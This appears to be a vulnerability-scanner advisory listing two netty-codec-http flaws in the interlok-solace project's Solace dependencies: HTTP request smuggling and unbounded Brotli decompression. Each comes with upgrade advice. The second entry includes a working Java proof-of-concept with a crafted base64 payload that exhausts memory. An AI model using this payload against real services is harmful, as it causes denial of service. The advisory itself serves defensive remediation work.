Find, fix and prevent vulnerabilities in your code.
high severity
new
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: com.solacesystems:sol-jcsmp@10.27.0 and com.solacesystems:sol-jms@10.27.0
Detailed paths
-
Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#327bc4cc81cef77d5ec2e3d5f1829b0472d4f423 › com.solacesystems:sol-jcsmp@10.27.0 › io.netty:netty-codec-http@4.1.118.Final
-
Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#327bc4cc81cef77d5ec2e3d5f1829b0472d4f423 › com.solacesystems:sol-jms@10.27.0 › io.netty:netty-codec-http@4.1.118.Final
-
Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#327bc4cc81cef77d5ec2e3d5f1829b0472d4f423 › com.solacesystems:sol-jcsmp@10.27.0 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
-
Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#327bc4cc81cef77d5ec2e3d5f1829b0472d4f423 › com.solacesystems:sol-jms@10.27.0 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to HTTP Request Smuggling via the parsing of chunk extensions in HTTP/1.1 messages with chunked encoding. An attacker can bypass HTTP request boundaries by sending specially crafted HTTP requests that exploit differences in how standalone newline characters are parsed between reverse proxies and the backend, potentially allowing them to smuggle additional requests.
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.125.Final, 4.2.5.Final or higher.
References
high severity
new
- Vulnerable module: io.netty:netty-codec-http
- Introduced through: com.solacesystems:sol-jcsmp@10.27.0 and com.solacesystems:sol-jms@10.27.0
Detailed paths
-
Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#327bc4cc81cef77d5ec2e3d5f1829b0472d4f423 › com.solacesystems:sol-jcsmp@10.27.0 › io.netty:netty-codec-http@4.1.118.Final
-
Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#327bc4cc81cef77d5ec2e3d5f1829b0472d4f423 › com.solacesystems:sol-jms@10.27.0 › io.netty:netty-codec-http@4.1.118.Final
-
Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#327bc4cc81cef77d5ec2e3d5f1829b0472d4f423 › com.solacesystems:sol-jcsmp@10.27.0 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
-
Introduced through: adaptris/interlok-solace@adaptris/interlok-solace#327bc4cc81cef77d5ec2e3d5f1829b0472d4f423 › com.solacesystems:sol-jms@10.27.0 › io.netty:netty-handler-proxy@4.1.118.Final › io.netty:netty-codec-http@4.1.118.Final
Overview
io.netty:netty-codec-http is a network application framework for rapid development of maintainable high performance protocol servers & clients.
Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) via the BrotliDecoder.decompress function, which has no limit on how often it calls pull, decompressing data 64K bytes at a time. An attacker can exhaust system memory and cause application downtime by submitting specially crafted compressed input that triggers excessive buffer allocations.
PoC
import io.netty.buffer.Unpooled;
import io.netty.channel.embedded.EmbeddedChannel;
import java.util.Base64;
public class T {
public static void main(String[] args) {
EmbeddedChannel channel = new EmbeddedChannel(new BrotliDecoder());
channel.writeInbound(Unpooled.wrappedBuffer(Base64.getDecoder().decode("aPpxD1tETigSAGj6cQ8vRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROKBIAaPpxD1tETigSAGj6cQ9bRE4oEgBo+nEPW0ROMBIAEgIaHwBETlQQVFcXlgA=")));
}
}
Remediation
Upgrade io.netty:netty-codec-http to version 4.1.125.Final or higher.